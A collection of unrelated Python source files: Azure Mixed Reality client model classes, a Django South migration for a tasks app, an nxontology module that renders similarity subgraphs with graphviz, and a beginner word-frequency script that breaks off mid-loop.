    """Result of a name-availability check.

    All required parameters must be populated in order to send to Azure.

    :param name_available: Required. if name Available. Possible values include: "true", "false".
    :type name_available: str or ~mixed_reality_client.models.NameAvailability
    :param reason: Resource Name To Verify. Possible values include: "Invalid", "AlreadyExists".
    :type reason: str or ~mixed_reality_client.models.NameUnavailableReason
    :param message: detail message.
    :type message: str
    """

    _validation = {
        'name_available': {'required': True},
    }

    _attribute_map = {
        'name_available': {'key': 'nameAvailable', 'type': 'str'},
        'reason': {'key': 'reason', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
    }

    def __init__(
        self,
        *,
        name_available: Union[str, "NameAvailability"],
        reason: Optional[Union[str, "NameUnavailableReason"]] = None,
        message: Optional[str] = None,
        **kwargs
    ):
        super(CheckNameAvailabilityResponse, self).__init__(**kwargs)
        self.name_available = name_available
        self.reason = reason
        self.message = message
class CloudErrorautogenerated(msrest.serialization.Model):
    """Envelope for an error response.

    :param error: An error response from Azure.
    :type error: ~mixed_reality_client.models.CloudErrorBodyautogenerated
    """

    _attribute_map = {
        'error': {'key': 'error', 'type': 'CloudErrorBodyautogenerated'},
    }

    def __init__(self, *, error: Optional["CloudErrorBodyautogenerated"] = None, **kwargs):
        super(CloudErrorautogenerated, self).__init__(**kwargs)
        self.error = error
class CloudErrorBody(msrest.serialization.Model):
    """Details of an error response from Azure.

    :param code: An identifier for the error. Codes are invariant and are intended to be consumed
     programmatically.
    :type code: str
    :param message: A message describing the error, intended to be suitable for displaying in a
     user interface.
    :type message: str
    :param target: The target of the particular error. For example, the name of the property in
     error.
    :type target: str
    :param details: A list of additional details about the error.
    :type details: list[~mixed_reality_client.models.CloudErrorBody]
    """

    _attribute_map = {
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
        'target': {'key': 'target', 'type': 'str'},
        'details': {'key': 'details', 'type': '[CloudErrorBody]'},
    }

    def __init__(
        self,
        *,
        code: Optional[str] = None,
        message: Optional[str] = None,
        target: Optional[str] = None,
        details: Optional[List["CloudErrorBody"]] = None,
        **kwargs
    ):
        super(CloudErrorBody, self).__init__(**kwargs)
        self.code = code
        self.message = message
        self.target = target
        # Nested CloudErrorBody entries allow recursive error detail.
        self.details = details
class CloudErrorBodyautogenerated(msrest.serialization.Model):
    """Details of an error response from Azure (autogenerated variant).

    :param code: An identifier for the error. Codes are invariant and are intended to be consumed
     programmatically.
    :type code: str
    :param message: A message describing the error, intended to be suitable for displaying in a
     user interface.
    :type message: str
    :param target: The target of the particular error. For example, the name of the property in
     error.
    :type target: str
    :param details: A list of additional details about the error.
    :type details: list[~mixed_reality_client.models.CloudErrorBodyautogenerated]
    """

    _attribute_map = {
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
        'target': {'key': 'target', 'type': 'str'},
        'details': {'key': 'details', 'type': '[CloudErrorBodyautogenerated]'},
    }

    def __init__(
        self,
        *,
        code: Optional[str] = None,
        message: Optional[str] = None,
        target: Optional[str] = None,
        details: Optional[List["CloudErrorBodyautogenerated"]] = None,
        **kwargs
    ):
        super(CloudErrorBodyautogenerated, self).__init__(**kwargs)
        self.code = code
        self.message = message
        self.target = target
        # Nested entries allow recursive error detail.
        self.details = details
class Identity(msrest.serialization.Model):
    """Managed identity attached to the resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar principal_id: The principal ID of resource identity.
    :vartype principal_id: str
    :ivar tenant_id: The tenant ID of resource.
    :vartype tenant_id: str
    :ivar type: The identity type. Default value: "SystemAssigned".
    :vartype type: str
    """

    _validation = {
        'principal_id': {'readonly': True},
        'tenant_id': {'readonly': True},
        'type': {'constant': True},
    }

    _attribute_map = {
        'principal_id': {'key': 'principalId', 'type': 'str'},
        'tenant_id': {'key': 'tenantId', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    # Constant: the only supported identity type for this API version.
    type = "SystemAssigned"

    def __init__(self, **kwargs):
        super(Identity, self).__init__(**kwargs)
        # Server-populated, read-only fields.
        self.principal_id = None
        self.tenant_id = None
class Operation(msrest.serialization.Model):
    """A single REST API operation exposed by the provider.

    :param name: Operation name: {provider}/{resource}/{operation}.
    :type name: str
    :param display: The object that represents the operation.
    :type display: ~mixed_reality_client.models.OperationDisplay
    """

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'display': {'key': 'display', 'type': 'OperationDisplay'},
    }

    def __init__(self, *, name: Optional[str] = None, display: Optional["OperationDisplay"] = None, **kwargs):
        super(Operation, self).__init__(**kwargs)
        self.name = name
        self.display = display
class OperationDisplay(msrest.serialization.Model):
    """Human-readable metadata describing a REST API operation.

    All required parameters must be populated in order to send to Azure.

    :param provider: Required. Service provider: Microsoft.ResourceProvider.
    :type provider: str
    :param resource: Required. Resource on which the operation is performed: Profile, endpoint,
     etc.
    :type resource: str
    :param operation: Required. Operation type: Read, write, delete, etc.
    :type operation: str
    :param description: Required. Description of operation.
    :type description: str
    """

    _validation = {
        'provider': {'required': True},
        'resource': {'required': True},
        'operation': {'required': True},
        'description': {'required': True},
    }

    _attribute_map = {
        'provider': {'key': 'provider', 'type': 'str'},
        'resource': {'key': 'resource', 'type': 'str'},
        'operation': {'key': 'operation', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
    }

    def __init__(self, *, provider: str, resource: str, operation: str, description: str, **kwargs):
        super(OperationDisplay, self).__init__(**kwargs)
        self.provider = provider
        self.resource = resource
        self.operation = operation
        self.description = description
class OperationPage(msrest.serialization.Model):
    """One page of the provider's operation list, with a link to the next page.

    :param value: List of operations supported by the Resource Provider.
    :type value: list[~mixed_reality_client.models.Operation]
    :param next_link: URL to get the next set of operation list results if there are any.
    :type next_link: str
    """

    _attribute_map = {
        'value': {'key': 'value', 'type': '[Operation]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, *, value: Optional[List["Operation"]] = None, next_link: Optional[str] = None, **kwargs):
        super(OperationPage, self).__init__(**kwargs)
        self.value = value
        self.next_link = next_link
class Resource(msrest.serialization.Model):
    """Common ARM resource base: id, name and type.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
     Microsoft.Storage/storageAccounts.
    :vartype type: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(Resource, self).__init__(**kwargs)
        # All three fields are read-only and filled in by the service.
        self.id = None
        self.name = None
        self.type = None
class TrackedResource(Resource):
    """ARM tracked top-level resource: a :class:`Resource` with a required
    geo-location and optional tags.

    Server-populated variables are ignored when sending a request; all
    required parameters must be populated in order to send to Azure.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines
     or Microsoft.Storage/storageAccounts.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :param location: Required. The geo-location where the resource lives.
    :type location: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'location': {'required': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'location': {'key': 'location', 'type': 'str'},
    }

    def __init__(self, *, location: str, tags: Optional[Dict[str, str]] = None, **kwargs):
        super().__init__(**kwargs)
        self.tags = tags
        self.location = location
class RemoteRenderingAccount(TrackedResource):
    """A Remote Rendering account resource.

    Server-populated variables are ignored when sending a request;
    ``location`` is required when creating the resource.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines
     or Microsoft.Storage/storageAccounts.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :param location: Required. The geo-location where the resource lives.
    :type location: str
    :param identity: Identity for the resource.
    :type identity: ~mixed_reality_client.models.Identity
    :ivar account_id: Unique id of the account.
    :vartype account_id: str
    :ivar account_domain: Domain name corresponding to the account.
    :vartype account_domain: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'location': {'required': True},
        'account_id': {'readonly': True},
        'account_domain': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'location': {'key': 'location', 'type': 'str'},
        'identity': {'key': 'identity', 'type': 'Identity'},
        'account_id': {'key': 'properties.accountId', 'type': 'str'},
        'account_domain': {'key': 'properties.accountDomain', 'type': 'str'},
    }

    def __init__(self, *, location: str, tags: Optional[Dict[str, str]] = None, identity: Optional["Identity"] = None, **kwargs):
        super().__init__(tags=tags, location=location, **kwargs)
        self.identity = identity
        # Populated by the service after creation.
        self.account_id = None
        self.account_domain = None
class RemoteRenderingAccountIdentity(Identity):
    """Identity of a Remote Rendering account.

    All fields are populated by the server; the identity ``type`` is fixed
    to the constant ``"SystemAssigned"``.

    :ivar principal_id: The principal ID of resource identity.
    :vartype principal_id: str
    :ivar tenant_id: The tenant ID of resource.
    :vartype tenant_id: str
    :ivar type: The identity type. Default value: "SystemAssigned".
    :vartype type: str
    """

    _validation = {
        'principal_id': {'readonly': True},
        'tenant_id': {'readonly': True},
        'type': {'constant': True},
    }

    _attribute_map = {
        'principal_id': {'key': 'principalId', 'type': 'str'},
        'tenant_id': {'key': 'tenantId', 'type': 'str'},
    }

    # Constant value enforced by the service.
    type = "SystemAssigned"

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
class RemoteRenderingAccountPage(msrest.serialization.Model):
    """One page of Remote Rendering accounts.

    Holds a page of resources plus the continuation link used to fetch
    the following page, if any.

    :param value: List of resources supported by the Resource Provider.
    :type value: list[~mixed_reality_client.models.RemoteRenderingAccount]
    :param next_link: Continuation URL for the next page of results.
    :type next_link: str
    """

    _attribute_map = {
        'value': {'key': 'value', 'type': '[RemoteRenderingAccount]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, *, value: Optional[List["RemoteRenderingAccount"]] = None, next_link: Optional[str] = None, **kwargs):
        super().__init__(**kwargs)
        self.value = value
        self.next_link = next_link
class SpatialAnchorsAccount(TrackedResource):
    """A Spatial Anchors account resource.

    Server-populated variables are ignored when sending a request;
    ``location`` is required when creating the resource.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines
     or Microsoft.Storage/storageAccounts.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :param location: Required. The geo-location where the resource lives.
    :type location: str
    :ivar account_id: Unique id of the account.
    :vartype account_id: str
    :ivar account_domain: Domain name of the Spatial Anchors account.
    :vartype account_domain: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'location': {'required': True},
        'account_id': {'readonly': True},
        'account_domain': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'location': {'key': 'location', 'type': 'str'},
        'account_id': {'key': 'properties.accountId', 'type': 'str'},
        'account_domain': {'key': 'properties.accountDomain', 'type': 'str'},
    }

    def __init__(self, *, location: str, tags: Optional[Dict[str, str]] = None, **kwargs):
        super().__init__(tags=tags, location=location, **kwargs)
        # Populated by the service after creation.
        self.account_id = None
        self.account_domain = None
class SpatialAnchorsAccountPage(msrest.serialization.Model):
    """One page of Spatial Anchors accounts.

    Holds a page of resources plus the continuation link used to fetch
    the following page, if any.

    :param value: List of resources supported by the Resource Provider.
    :type value: list[~mixed_reality_client.models.SpatialAnchorsAccount]
    :param next_link: Continuation URL for the next page of results.
    :type next_link: str
    """

    _attribute_map = {
        'value': {'key': 'value', 'type': '[SpatialAnchorsAccount]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, *, value: Optional[List["SpatialAnchorsAccount"]] = None, next_link: Optional[str] = None, **kwargs):
        super().__init__(**kwargs)
        self.value = value
        self.next_link = next_link
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration for the ``tasks`` app.

    Replaces the explicit ``UserTask`` through-model with a plain M2M table
    (``Task.user_task``), merges ``Comment.description``/``Comment.name``
    into a single ``Comment.body`` text field, and repoints user foreign
    keys from ``auth.User`` to the custom ``users.User`` model.
    """

    def forwards(self, orm):
        """Apply the migration."""
        # Deleting model 'UserTask'
        db.delete_table('tasks_usertask')

        # Changing field 'Task.created_by'
        # (repointed from auth.User to the custom users.User model)
        db.alter_column('tasks_task', 'created_by_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['users.User']))

        # Adding M2M table for field user_task on 'Task'
        m2m_table_name = db.shorten_name('tasks_task_user_task')
        db.create_table(m2m_table_name, (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('task', models.ForeignKey(orm['tasks.task'], null=False)),
            ('user', models.ForeignKey(orm['users.user'], null=False))
        ))
        db.create_unique(m2m_table_name, ['task_id', 'user_id'])

        # Deleting field 'Comment.description'
        db.delete_column('tasks_comment', 'description')

        # Deleting field 'Comment.name'
        db.delete_column('tasks_comment', 'name')

        # Adding field 'Comment.body'
        # default=1 satisfies NOT NULL for pre-existing rows;
        # keep_default=False drops the default again afterwards.
        db.add_column('tasks_comment', 'body',
                      self.gf('django.db.models.fields.TextField')(default=1),
                      keep_default=False)

        # Changing field 'Comment.user'
        db.alter_column('tasks_comment', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['users.User']))

    def backwards(self, orm):
        """Revert the migration (data in 'Comment.body' is lost)."""
        # Adding model 'UserTask'
        db.create_table('tasks_usertask', (
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('completed', self.gf('django.db.models.fields.DateField')(null=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(blank=True, auto_now_add=True)),
            ('task', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['tasks.Task'])),
            ('reassigned', self.gf('django.db.models.fields.DateField')(null=True)),
            ('updated', self.gf('django.db.models.fields.DateTimeField')(blank=True, auto_now=True)),
            ('removed', self.gf('django.db.models.fields.DateField')(null=True)),
        ))
        db.send_create_signal('tasks', ['UserTask'])

        # Changing field 'Task.created_by' (back to auth.User)
        db.alter_column('tasks_task', 'created_by_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User']))

        # Removing M2M table for field user_task on 'Task'
        db.delete_table(db.shorten_name('tasks_task_user_task'))

        # Adding field 'Comment.description'
        db.add_column('tasks_comment', 'description',
                      self.gf('django.db.models.fields.TextField')(default=1),
                      keep_default=False)

        # Adding field 'Comment.name'
        db.add_column('tasks_comment', 'name',
                      self.gf('django.db.models.fields.CharField')(max_length=255, default=1),
                      keep_default=False)

        # Deleting field 'Comment.body'
        db.delete_column('tasks_comment', 'body')

        # Changing field 'Comment.user' (back to auth.User)
        db.alter_column('tasks_comment', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User']))

    # Frozen ORM state used by South to materialise model classes at
    # migration time.  NOTE(review): the 'password' field type below reads
    # '<PASSWORD>' - this is a redaction artifact in the stored file, not a
    # valid field path; confirm against the original migration.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'to': "orm['auth.Permission']", 'symmetrical': 'False'})
        },
        'auth.permission': {
            'Meta': {'unique_together': "(('content_type', 'codename'),)", 'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'contenttypes.contenttype': {
            'Meta': {'unique_together': "(('app_label', 'model'),)", 'ordering': "('name',)", 'db_table': "'django_content_type'", 'object_name': 'ContentType'},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'projects.project': {
            'Meta': {'object_name': 'Project'},
            'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.User']"}),
            'description': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now': 'True'})
        },
        'tasks.comment': {
            'Meta': {'object_name': 'Comment'},
            'body': ('django.db.models.fields.TextField', [], {}),
            'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'task': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tasks.Task']"}),
            'updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.User']"})
        },
        'tasks.image': {
            'Meta': {'object_name': 'Image'},
            'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
            'task': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tasks.Task']"}),
            'updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now': 'True'})
        },
        'tasks.task': {
            'Meta': {'object_name': 'Task', 'ordering': "['-created']"},
            'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.User']", 'related_name': "'creator'"}),
            'description': ('django.db.models.fields.TextField', [], {}),
            'due': ('django.db.models.fields.DateField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'project': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'to': "orm['projects.Project']"}),
            'status': ('django.db.models.fields.IntegerField', [], {}),
            'task_type': ('django.db.models.fields.IntegerField', [], {}),
            'updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now': 'True'}),
            'user_task': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['users.User']", 'symmetrical': 'False'})
        },
        'users.user': {
            'Meta': {'object_name': 'User'},
            'avatar': ('django.db.models.fields.files.ImageField', [], {'null': 'True', 'blank': 'True', 'max_length': '100'}),
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'blank': 'True', 'max_length': '75'}),
            'first_name': ('django.db.models.fields.CharField', [], {'blank': 'True', 'max_length': '30'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'symmetrical': 'False', 'related_name': "'user_set'", 'to': "orm['auth.Group']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'blank': 'True', 'max_length': '30'}),
            'password': ('<PASSWORD>', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'symmetrical': 'False', 'related_name': "'user_set'", 'to': "orm['auth.Permission']"}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        }
    }
complete_apps = ['tasks'] |
<reponame>related-sciences/nxontology
from typing import Dict, Iterable, Optional
from networkx.drawing.nx_agraph import to_agraph
from pygraphviz.agraph import AGraph
from nxontology.ontology import Node, Node_Info, SimilarityIC
def create_similarity_graphviz(
    sim: SimilarityIC[Node],
    nodes: Optional[Iterable[Node]] = None,
) -> "AGraph":
    """
    Create a pygraphviz AGraph to render the similarity subgraph with graphviz.
    Works by creating a subgraph in networkx with the relevant nodes.
    Then attributes are added to the subgraph to expose the proper metadata
    and style information to graphviz. See https://graphviz.org/doc/info/attrs.html.

    ## Parameters:

    - sim: SimilarityIC instance, which also provides access to the underlying nxo/graph.
    - nodes: Nodes to include in the subgraph. If None, set to the union of ancestors.
    """
    source = sim.node_0
    target = sim.node_1
    if nodes is None:
        nodes = sim.union_ancestors
    nodes = set(nodes)
    # independent shallow copy: creates new independent attribute dicts
    subgraph = sim.nxo.graph.subgraph(nodes).copy()
    # node labels and fill/font colors
    for node, data in subgraph.nodes(data=True):
        # Base style; later loops append modifiers like ",dotted" to it,
        # so this assignment must run first for every node.
        data["style"] = "filled"
        info = sim.nxo.node_info(node)
        # HTML-like graphviz label: node label plus both scaled IC metrics.
        data["label"] = (
            f"<{info.label}<br/>"
            '<font point-size="9">'
            f"IC<sub>res</sub> {info.intrinsic_ic_scaled:.2f} · "
            f"IC<sub>sán</sub> {info.intrinsic_ic_sanchez_scaled:.2f}"
            "</font>>"
        )
        if info.identifier:
            data["tooltip"] = info.identifier
        if info.url:
            data["URL"] = info.url
        # Fill color encodes the selected scaled IC metric; switch to white
        # text on dark (high-IC) backgrounds for legibility.
        scaled_ic = getattr(info, sim.ic_metric_scaled)
        data["fillcolor"] = get_hex_color(scaled_ic)
        data["fontcolor"] = "#ffffff" if scaled_ic > 0.7 else "#000000"
    # node styles
    # Nodes outside the union of ancestors: hide the border.
    for node in nodes - sim.union_ancestors:
        # subgraph.nodes[node]["style"] += ",invis"
        subgraph.nodes[node]["penwidth"] = 0.0
    # disjoint ancestors excluding source & target style
    # (& and - have equal precedence and evaluate left-to-right here)
    for node in nodes & sim.union_ancestors - sim.common_ancestors - {source, target}:
        subgraph.nodes[node]["style"] += ",dotted"
    # common ancestors style
    for node in nodes & sim.common_ancestors:
        subgraph.nodes[node]["style"] += ",solid"
    # Most informative common ancestor gets a thicker border.
    if sim.mica:
        subgraph.nodes[sim.mica]["penwidth"] = 2.5
    # source and target style
    for node in nodes & {source, target}:
        subgraph.nodes[node]["style"] += ",dashed"
        subgraph.nodes[node]["penwidth"] = 2.5
    # title
    ic_abbr = {"intrinsic_ic": "res", "intrinsic_ic_sanchez": "sán"}[sim.ic_metric]
    source_verbose_label = get_verbose_node_label(sim.info_0)
    target_verbose_label = get_verbose_node_label(sim.info_1)
    subgraph_name = f"{sim.nxo.name} subgraph" if sim.nxo.name else "Subgraph"
    subgraph.graph["label"] = (
        f"<{subgraph_name} with ancestors of {source_verbose_label} and {target_verbose_label}. "
        f"Similarity: common ancestors = {sim.n_common_ancestors}, union ancestors = {sim.n_union_ancestors}, Lin<sub>{ic_abbr}</sub> = {sim.lin:.2f}>"
    )
    subgraph.graph["labelloc"] = "t"  # title at the top
    # raster resolution
    subgraph.graph["dpi"] = 125
    gviz = to_agraph(subgraph)
    gviz.layout("dot")
    return gviz
def get_verbose_node_label(info: Node_Info[Node]) -> str:
    """Format a node as 'label (identifier)', or just 'label' when the
    node has no identifier."""
    label = info.label
    assert isinstance(label, str)
    if not info.identifier:
        return label
    return f"{label} ({info.identifier})"
# Sequential green colormap: percentage (0-100) -> '#rrggbb'.
# Generated from the following code (generation code not included to keep
# dependencies light):
#
#     import matplotlib.pyplot as plt
#     from matplotlib.colors import to_hex
#     # https://matplotlib.org/examples/color/colormaps_reference.html
#     colormap: "matplotlib.colors.LinearSegmentedColormap" = plt.cm.Greens
#     {x: to_hex(colormap(x / 100)) for x in range(0, 101)}
colormap: Dict[int, str] = {
    0: "#f7fcf5", 1: "#f6fcf4", 2: "#f4fbf2", 3: "#f3faf0", 4: "#f1faee",
    5: "#f0f9ed", 6: "#eff9eb", 7: "#edf8ea", 8: "#ecf8e8", 9: "#eaf7e6",
    10: "#e9f7e5", 11: "#e7f6e3", 12: "#e6f5e1", 13: "#e4f5df", 14: "#e2f4dd",
    15: "#dff3da", 16: "#ddf2d8", 17: "#dbf1d5", 18: "#d8f0d2", 19: "#d6efd0",
    20: "#d3eecd", 21: "#d1edcb", 22: "#ceecc8", 23: "#ccebc6", 24: "#caeac3",
    25: "#c7e9c0", 26: "#c4e8bd", 27: "#c1e6ba", 28: "#bee5b8", 29: "#bbe4b4",
    30: "#b8e3b2", 31: "#b5e1ae", 32: "#b2e0ac", 33: "#afdfa8", 34: "#abdda5",
    35: "#a9dca3", 36: "#a5db9f", 37: "#a3da9d", 38: "#9fd899", 39: "#9cd797",
    40: "#98d594", 41: "#95d391", 42: "#91d28e", 43: "#8dd08a", 44: "#8ace88",
    45: "#86cc85", 46: "#83cb82", 47: "#7fc97f", 48: "#7cc87c", 49: "#78c679",
    50: "#73c476", 51: "#70c274", 52: "#6bc072", 53: "#68be70", 54: "#63bc6e",
    55: "#60ba6c", 56: "#5bb86a", 57: "#58b668", 58: "#53b466", 59: "#4eb264",
    60: "#4bb062", 61: "#46ae60", 62: "#43ac5e", 63: "#3fa95c", 64: "#3ea75a",
    65: "#3ba458", 66: "#39a257", 67: "#369f54", 68: "#339c52", 69: "#319a50",
    70: "#2f974e", 71: "#2d954d", 72: "#2a924a", 73: "#289049", 74: "#258d47",
    75: "#228a44", 76: "#208843", 77: "#1d8640", 78: "#1a843f", 79: "#17813d",
    80: "#157f3b", 81: "#127c39", 82: "#107a37", 83: "#0c7735", 84: "#097532",
    85: "#077331", 86: "#03702e", 87: "#016e2d", 88: "#006b2b", 89: "#00682a",
    90: "#006428", 91: "#006227", 92: "#005e26", 93: "#005a24", 94: "#005723",
    95: "#005321", 96: "#005120", 97: "#004d1f", 98: "#004a1e", 99: "#00471c",
    100: "#00441b",
}


def get_hex_color(x: float) -> str:
    """Map ``x`` in [0.0, 1.0] onto a hex-encoded '#rrggbb' green."""
    if x < 0.0 or x > 1.0:
        raise ValueError(f"x must be between 0.0 and 1.0: got {x}")
    return colormap[round(100 * x)]
|
<filename>ask5.py
import string, re

# The author processed LICENSE.txt instead of "tale of two cities.txt"
# because the larger text took over two hours on their laptop.  For the
# big text, the ten most frequent words and their counts were:
# 1.the 8241  2.and 5071  3.of 4143  4.to 3653  5.a 3017  6.in 2665
# 7.it 2082  8.his 2011  9.i 1990  10.that 1956
f = open("LICENSE.txt")
new = f.read()
f.close()
new = new.lower()
# Replace every non-letter character with a space so only words remain.
kai = re.sub(r'[^a-z ]+', ' ', new)
data = kai.split()  # one entry per word of the pre-processed text

# Slots for the ten most frequent words and their occurrence counts.
le3h1 = ""
le3h2 = ""
le3h3 = ""
le3h4 = ""
le3h5 = ""
le3h6 = ""
le3h7 = ""
le3h8 = ""
le3h9 = ""
le3h10 = ""
sum1 = 0
sum2 = 0
sum3 = 0
sum4 = 0
sum5 = 0
sum6 = 0
sum7 = 0
sum8 = 0
sum9 = 0
sum10 = 0
# Slots for the 3 most frequent two-letter prefixes of words.
f2le1 = ""
f2le2 = ""
f2le3 = ""  # BUG FIX: was misspelled "f3l3", which could leave f2le3 unbound at the final print
sumf2le1 = 0
sumf2le2 = 0
sumf2le3 = 0
# Slots for the 3 most frequent three-letter prefixes of words.
f3le1 = ""
f3le2 = ""
f3le3 = ""
sumf3le1 = 0
sumf3le2 = 0
sumf3le3 = 0
stoixeia = len(data)
for i in range(0, stoixeia):
    # Per-word counters: occurrences of the word itself and of its
    # two- and three-letter prefixes across the whole text.
    sum2f = 0
    sum3f = 0
    sumf = 0
    le3h = data[i]
    le2 = le3h[:2]
    le3 = le3h[:3]
    for w in range(0, stoixeia):
